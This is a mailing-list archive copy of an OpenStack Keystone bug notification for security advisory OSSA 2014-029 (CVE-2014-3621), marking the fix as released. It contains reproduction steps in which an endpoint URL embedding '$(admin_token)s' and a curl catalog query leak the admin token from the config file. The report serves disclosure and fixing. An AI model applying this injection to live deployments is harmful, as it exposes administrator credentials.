yahoo-eng-team team mailing list archive

Thread
Date

[Bug 1354208] Re: [OSSA 2014-029] Catalog replacement allows reading config (CVE-2014-3621)

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Tristan Cacqueray <tristan.cacqueray@xxxxxxxxxxxx>
Date: Wed, 17 Sep 2014 17:35:24 -0000
Reply-to: Bug 1354208 <1354208@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

** Changed in: ossa
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1354208

Title:
  [OSSA 2014-029] Catalog replacement allows reading config
  (CVE-2014-3621)

Status in OpenStack Identity (Keystone):
  Fix Committed
Status in Keystone havana series:
  Fix Committed
Status in Keystone icehouse series:
  Fix Committed
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  
  Anyone that can create endpoints can read any value out of the config file. Some of the values in the config file are passwords and things that shouldn't be made available.

  For example, I'm running and cloud and I allow someone to define their
  own endpoints for whatever reason... maybe they control their own
  subcloud. If the admin creates an endpoint with $(admin_token), then
  queries the catalog, they can read the admin token out of the config
  file.

  I don't know what the fix is. Maybe a whitelist of config options?
  Maybe leaving "secret=True" config options out of the dict is good
  enough?

  Here's steps to recreate:

  $ openstack service create --type test test
  +-------------+----------------------------------+
  | Field       | Value                            |
  +-------------+----------------------------------+
  | description | None                             |
  | enabled     | True                             |
  | id          | 9251fab0a273454d84046c810b3503a7 |
  | name        | test                             |
  | type        | test                             |
  +-------------+----------------------------------+

  # Define an endpoint with $(admin_token)s.

  $ openstack endpoint create 9251fab0a273454d84046c810b3503a7 --publicurl 'http://something/$(admin_token)s'
  +--------------+----------------------------------+
  | Field        | Value                            |
  +--------------+----------------------------------+
  | id           | 164abc0b305e4ad998ac732cda569cd6 |
  | publicurl    | http://something/$(admin_token)s |
  | region       | None                             |
  | service_id   | 9251fab0a273454d84046c810b3503a7 |
  | service_name | test                             |
  | service_type | test                             |
  +--------------+----------------------------------+

  # Get a scoped token using curl.

  $ curl -i   -H "Content-Type: application/json"   -d '
  { "auth": {
      "identity": {
        "methods": ["password"],
        "password": {
          "user": {
            "name": "admin",
            "domain": { "id": "default" },
            "password": "mypassword"
          }
        }
      },
      "scope": {
        "project": {
          "name": "demo",
          "domain": { "id": "default" }
        }
      }
    }
  }'   http://localhost:35357/v3/auth/tokens ; echo

  ... Look for the admin token in the catalog in the response:
  {"endpoints": [{"url": "http://something/myadmintoken";,
  ...

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1354208/+subscriptions